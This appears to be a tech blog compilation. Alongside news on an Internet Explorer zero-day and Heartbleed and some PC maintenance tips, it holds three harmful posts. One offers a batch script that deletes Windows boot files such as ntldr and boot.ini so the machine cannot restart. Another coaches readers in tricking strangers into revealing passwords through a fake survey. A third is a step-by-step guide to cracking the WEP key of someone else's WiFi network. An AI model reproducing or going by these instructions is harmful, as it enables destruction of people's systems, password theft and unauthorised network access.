Internet Explorer hit by serious vulnerability – MS issues security patch – Windows XP Included


Microsoft has reported that a security flaw in its Internet Explorer browser could allow hackers to access your personal information especially if you are still using Windows XP.

The bug has been found to affect IE versions 6 through 11 and was found by Microsoft’s security company FireEye. The company says that the flaw leaves around 56 percent of the browser market vulnerable to attack. The bug has been classified as a “Zero Day” flaw which gives victims zero warnings before attack.

The flaw is a remote code execution vulnerability which means that a hacker can successfully run software on a victim’s computer after attack. Microsoft issued a security alert which said that “the vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. The phrase “arbitrary code” means pretty much any software that the attacker chooses to run.”

In short, a hacker could install programs, view and delete data simply by visiting a website that you are running at the same time on your IE.

FireEye has said that a gang of attackers has already launched a campaign exploiting the flaw. Microsoft reported that IE9 through IE11 versions are the worst-hit as the three versions of IE account for almost 26 percent of the web browsers currently in use around the world. The software giant has said that Internet Explorer 10 and 11 are safe from the flaw only if the Enhanced Protected Mode in these browsers is turned on. The company is currently working on fixing the problem and might soon come out with an update.

UPDATE : Microsoft is issuing a fix for the “zero-day” vulnerability found in Internet Explorer last week. The update should be rolling out to all users any time now. In addition to updating Internet Explorer, Microsoft is also providing a fix for Windows XP, despite the fact that the operating system is no longer officially supported. The fix was issued because support for XP ended recently.

Source : Microsoft.

Heartbleed bug: What you need to know


What is Heartbleed bug?

Heartbleed is a security bug in the open-source OpenSSL cryptography library, widely used to implement the Internet’s Transport Layer Security (TLS) protocol. A fixed version of OpenSSL was released on April 7, 2014, at the same time as Heartbleed was publicly disclosed. At that time, some 17 percent (around half a million) of the Internet’s secure web servers certified by trusted authorities were believed to be vulnerable to the attack, allowing theft of the servers’ private keys and users’ session cookies and passwords.

heartbleed

The issue is registered in the Common Vulnerabilities and Exposures system as CVE-2014-0160.

The damage caused by the “Heartbleed” bug is currently unknown. The security hole exists on a vast number of the internet’s web servers and went undetected for more than two years. While it’s conceivable that the flaw was never discovered by hackers, it’s nearly impossible to tell.

There isn’t much that people can do to protect themselves until the affected websites implement a fix.

Why is it a big deal?

Heartbleed affects the encryption technology designed to protect online accounts for email, instant messaging and e-commerce. It was discovered by a team of researchers from the Finnish security firm Codenomicon, along with a Google researcher who was working separately.

It’s unclear whether any information has been stolen as a result of Heartbleed, but security experts are particularly worried about the bug because it went undetected for more than two years.

How does it work?

Heartbleed creates an opening in SSL/TLS, an encryption technology marked by the small, closed padlock and “https:” on Web browsers to show that traffic is secure. The flaw makes it possible to snoop on Internet traffic even if the padlock is closed. Interlopers can also grab the keys for deciphering encrypted data without the website owners knowing the theft occurred.

The problem affects only the variant of SSL/TLS known as OpenSSL, but that happens to be one of the most common on the Internet.

Which sites are affected?

There are half a million believed to be vulnerable so too many to list but there is a glut of new sites offering users the chance to check whether the online haunts they use regularly are affected.

The LastPass website  has compiled a list as has new websiteMashable . Meanwhile security firm Kaspersky directs people to theHeartbleed test.

While Facebook and Google say that they have patched their services, according to the Kaspersky blog,  there is a long list of sites that are still vulnerable, including Flickr, OkCupid and Github.

One of the biggest tech firms remaining on the vulnerable list was Yahoo but, as of last night, it too seemed to have remedied the problem saying it “had made the appropriate corrections across our entire platform”.

Many more sites will spend the coming days scrambling to do the same.

Bruce Schneier called on internet companies to issue new certificates and keys for encrypting internet traffic. Doing so would render stolen keys useless, he said.

Worst case scenario

The bad news, according to a blog from security firm Kaspersky  is that “exploiting Heartbleed leaves no traces so there is no definitive way to tell if the server was hacked and what kind of data was stolen”.

Security experts say that they are starting to see evidence that hacker groups are conducting automated scans of the internet in search of web servers using OpenSSL.

And Kaspersky said that it had uncovered evidence that groups believed to be involved in state-sponsored cyber-espionage were running such scans shortly after news of the bug broke.

Tips to Maintain a Virus Free Computer


Follow these Tips to Maintain a Virus Free Computer……

1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use a good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.

2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive.

3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).

4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.

• Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.

• You can also use a pop-up blocker to automatically block those pop-ups.

5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.

6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virues. If PC security is your first option then it is recommended that you go for a shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides realtime security for your PC. Make sure that this feature is turned on.

7. Install a good Antispyware program, that operates against Internet malware and spyware.

8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.

9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.

10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.

11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.

12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.

Thanks Kyrion.

Want to shutdown your PC Forever ?


Note : Please do not try this code. Code provided for Educational Purpose only. We are not responsible for any damage caused because of this post.

Code to shutdown your Windows PC Forever : Try at your own Risk.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.

DONT RUN THE BATCH FILE THIS WILL SHUT YOUR PC FOREVER…..

This should shutdown the  computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.

Got this code by Googleing…..More codes coming soon….

Make your Laptop Run Efficiently


Here are a few simple tips that you can use to make your laptop run faster, and last longer:

  • Defragment your laptop on a regular basis – at least once a week. Your computer breaks all of your files up into many pieces, and scatters them throughout your hard drive.  What defragmenting does is take all these mixed and scattered pieces, and re-organizes them neatly into a space where they can be easily accessed more quickly.

Procedure : Right click on the drive (Ex. C:) –> Properties –> Tools –> Defragment Now.

Downloads : Instead of using the above method you can use a software called Defraggler for this purpose. DOWNLOAD

  • Cleaning your Registry is a must. One of the most important parts of Windows is the registry. Fatal errors to your laptop can occur from disfiguration or corruption of this section. The most common cause of registry problems is buggy software installation.  Keep your registry clean and consider getting and running a registry cleaner from time to time. There are many of these programs available online, and some of them are even free .

Downloads : Ccleaner is one of the best freeware available for Registry Cleaning. DOWNLOAD

  • Unclutter your hard drive of unnecessary programs and files such as entertainment, games, music, pictures, etc. If you allow them to add up, these files can clog the hard drive and slow it down. If your hard drive is too full, it can also cause problems with your computer’s RAM and processing capability. This can lead to significant slow-downs and frequent crashes.

Procedure : Delete all unnecessary Files (Shift+Delete allows you to delete files without storing them in recycle bin).

  • Get good virus protection. You need to run a good anti-virus program and spyware/adware program at least once a week, if not more. Many people do this every day at start-up. Most of these programs are able to run automatically on their own schedule without your assistance, which can save you a lot of time . Here are some free Programs….

Downloads : Comodo Internet Security , AVG

  • Empty the recycle bin regularly. It doesn’t do you a lot of good to delete all that unnecessary junk if it’s just going to sit in your Recycle Bin. No one likes taking out the trash but it needs to be done!

Procedure : Right click Recycle Bin –> Empty Recycle Bin

  • Erase temporary Internet Files. This cannot be stressed or emphasized enough. Every time you go to a site on the web or open a file, a temporary copy is made and kept in your hard drive. They may be called “temporary” but they’re there for a long time. The more you have on your system, the more they’re going to slow down your laptop. Whether you’re running Firefox, Chrome or Internet Explorer, find out how to clear your browser’s cache, and do it regularly .

Procedure : Ccleaner will do this thing for you….!

  • Get rid of unnecessary startup programs. Many programs want to start running as soon as you boot up your computer. Although these programs may not always be visible on your desktop, they’re still running in the background and sucking up your valuable RAM. This can significantly slow down the laptop as time goes by. Find out how to modify your “msconfig”, and manually remove these programs from launching on startup. You won’t be removing them from your computer, just preventing them from running every time you start up your computer .

Procedure : Win + R –> Type msconfig and press Enter –> Startup –> Uncheck unnecessary Programs –> Click ok.

  • Keep your laptop running cool. Avoid keeping your laptop directly on a soft surface such as your bed or couch. It needs to be able to breather freely and allow air to circulate. Otherwise, your processor might overheat, causing slow-downs, crashes and even physical damage to components.

You may get cooler pads for cooling your laptop.

  • Uninstall unused programs. Any programs that are not being used are just taking up space on your hard drive. Please note that deleting a program folder is not the same as uninstalling. Make sure to properly remove programs using the Uninstall function in your Control Panel. Otherwise, you could just end up creating more problems.

Procedure : Open Control Panel –> Select Add/Remove Programs –> uninstall unused programs.

  • Upgrade your RAM if necessary. If you have a tendency of having many large programs all opened at once, you may not have enough RAM on your system. Look into purchasing some new RAM. Prices are very reasonable, and it’s a cost-effective way to increase the speed and efficiency of your laptop.

Social Engineering


Social Engineering is the art of Hacking In Real Life. Social engineering is the art of getting people to tell you stuff that they usually wouldn’t disclose, through the use of words and your appearance.

A good Social engineerer (or as I love to call these types of people, “Bullshit artists”), can make people believe nearly anything.

I will use the example of someone trying to get someone’s password:

Now the most important thing is having a believable story. If you go to someone and say “hotmail have requested i get your password for account checking”, then they will most likely tell you to piss off.

One of the most common ways that i use, is “I’m doing a survey”. Make a fake survey, attach it to a clip board, and just walk up to the person and start asking him questions.

For example:
Hi, my name is Alexander, and I am doing a survey on how strong peoples passwords are. You will be surprised at how insecure most people’s passwords are, and you may find it extremely worrying about how insecure your password may be. If you don’t mind, would you allow me to ask you a few questions?

The person will think “insecure personal information” and 9 times out of 10 will agree to talk to you.

Ask them questions like “does your password contain letters numbers and symbols”, “how long is your password” (when they are counting, watch their lips to see if they spell the words/numbers out), etc.

You may also be able to give them the “i also have a good way of calculating how strong your password is. This isn’t necessary but you can give me a password you use most frequently and i can calculate how strong it is”, but that sometimes pushes the bar a little too much.

Prevention of Social Engineering

As you can probably see above, the power of SE can EASILY be used against people. It is always a good idea to be aware of people who you don’t know, but it is also good practice to watch people you DO know. Don’t be getting paranoid about things, because that isn’t what i mean, but SE is the EASIEST way to hack anything.

Here are some tips of keeping safe:

I cant have a complete list, because Social Engineers are constantly changing the ways in which they gain trust.
A few things to look out for:

Something that is too good to be true

If its too good to be true, then it probably is. Always make sure that the person is trusted, or is well known. Hey, don’t just go on that, the person may have fooled everyone, but it is always good to ask yourself “If this is such a good offer, how can he/she be offering it.”

Someone who you never usually talk to has started being really interested in you

They might just have become really interested in you, but what for? If they start asking really strange/personal questions, I would recommend you play the “Playing it hard” game. Ask them the same question as your answer, and refuse to tell them until they tell you. Then just be like “I don’t believe you”. Doesn’t matter if its true or not, but what you have just done is proven to them they aren’t as trusted as they believed they were, even if its only psychological. Then just make up an excuse so you need to go. There are plenty of ways to just get out of something, but i prefer the method where you beat them at their own game. Make it SO much more entertaining =)

Someone you don’t know asks you for your details

Obviously you don’t give them out, you would have to be stupid to do that.

As a rule of thumb, just make sure that the person isn’t trying anything. You will find it hard to pick a real good Social engineerer, but just remember that there are always people out there who aren’t that good, trying it.

Remember: Never give out details, or secure information such as your passwords. Use passwords that aren’t anything to do with your age/DOB/FirstName/Surname etc. All of that can be found too easily.

This Post was written with the beginner in mind, and just defines the basics of the Social Engineering techniques.

Source : Hack PC Online

WEP Cracking in Windows


NTRODUCTION :

Many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on BackTrack and other Linux Tools .Im just sharing the method to Crack WiFi networks using WEP security protocol . The WEP is a very vuarable to attacks and can be cracked easily .

It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .

The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it .

You will be using two tools .

1.Commview for WiFi :

You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .The more packets you capture the better chances of cracking the password .You will need more than 1,00,000 minium packets to crack the password .The packets will be captured in the .ncp format .You will use this tool to convert the .ncp to .cap .

NOTE : Some WiFi cards are supported by Commview only in Windows 7 so i suggest you install Win 7 in ur Virtual Machine if ur card isnt supported .

 2.Aircrack-Ng GUI :

You will use this tool to crack the password of the Access Point using the .cap files you obtained from the Commview application .

NOTE : You need to run this as administrator .

I have provided links for both the software below .

Download Links :

These are the links to the official website of the tools .Some Anti Viruses might detect Aircrack as a virus . It is a false positive .

1.Aircrack-NG GUI

Get it from here : http://www.aircrack-ng.org/

 2.Commview for Wifi

Get it from here : http://www.tamos.com/download/main/ca.php

 GET READY TO CRACK :

STEP 1 :

1.Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP .
It automatically installs the necessary drivers . Allow it to install .

NOTE : You will not be able to connect to any Network using WiFi when using CommView .

STEP 2 :

2.Click on the PLAY ICON in the Left First .

STEP 3 (Choosing the Network (a) ) :

A new window should pop up now .
Click on the START SCANNING button .
Spoiler (Click to View)

STEP 4 (Choosing the Network (b) ) :

Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
NOTE : This tutorial is only for WEP protected networks .

STEP 5 (Capturing the Packets) :

The windows should close now and you should see that CommView has started Capturing Packets .

STEP 6 (Saving the Packets ) :

Now that the Packets are getting captured you need to Save them.
Click on Settings->Options->Memory Usage
Change Maximum Packets in buffer to 20000
Spoiler (Click to View)

Click on the LOGGING Tab .
Check AUTO-SAVING
In the Maximum Directory Size : 2000
Average Log File Size : 20

Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .

STEP 7 ( Concatenating the Logs ) :

Since you are capturing a lot of logs you will need to concatenate them into once file .
To do this go to Logging and click on CONCATENATE LOGS
Choose all the files that have been saved in your specified folder and Concatenate them .

Now you will have one .ncf file .

STEP 8 (Converting .ncf to .cap ) :

Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .
Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file
Now File->Export->Wireshark/TCP dump format .

——————————————————————

Aircrack Part :

Now for the Second Part Cracking this is very simple .

Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe

Choose the .cap file and you should be able to do the others .

SOURCE : Facebook.